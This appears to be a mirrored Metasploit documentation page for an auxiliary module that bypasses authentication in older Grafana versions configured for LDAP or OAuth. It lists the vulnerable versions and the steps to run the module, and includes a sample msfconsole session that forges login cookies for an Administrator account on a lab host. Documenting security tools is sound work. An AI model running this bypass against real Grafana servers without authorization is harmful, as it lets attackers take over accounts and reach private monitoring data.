CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md
Views: 1904

Vulnerable Application

The following list shows the vulnerable versions of Grafana when configured for LDAP or OAuth:

  1. 2.x

  2. 3.x

  3. 4.x befroe 4.6.4

  4. 5.x before 5.2.3

Verification Steps

  1. Start msfconsole

  2. Do: use auxiliary/admin/http/grafana_auth_bypass

  3. Do: set username <username> or set cookie <cookie>

  4. Do: set version

  5. Do: set rhosts

  6. Do: set rport

  7. Do: run

Scenarios

Example run against Grafana 3.x with username admin:

msf5 > use auxiliary/admin/http/grafana_auth_bypass 
msf5 auxiliary(admin/http/grafana_auth_bypass) > show options 

Module options (auxiliary/admin/http/grafana_auth_bypass):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COOKIE                      no        Decrypt captured cookie
   RHOSTS     127.0.0.1        yes       Address of target
   RPORT      3000             yes       Port of target
   SSL        false            yes       set SSL/TLS based connection
   TARGETURI  /                no        Base URL of grafana instance
   THREADS    1                yes       The number of concurrent threads
   USERNAME                    no        Valid username
   VERSION    5                yes       Grafana version: "2-4" or "5" (Accepted: 2-4, 5)

msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
RHOSTS => 192.168.202.3
msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
USERNAME => Administrator
msf5 auxiliary(admin/http/grafana_auth_bypass) > run

[*] Running for 192.168.202.3...
[+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f
[+] Set following cookies to get access to the grafana instance.
[+] grafana_user=Administrator;
[+] grafana_remember=a232b98b9365d3d8f7ce253adfb9779f1114131a68cc8cbb4a53ee6f5cb71acfbe25773e95db051021;
[+] grafana_sess=4ecdc0c13ebca229;
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed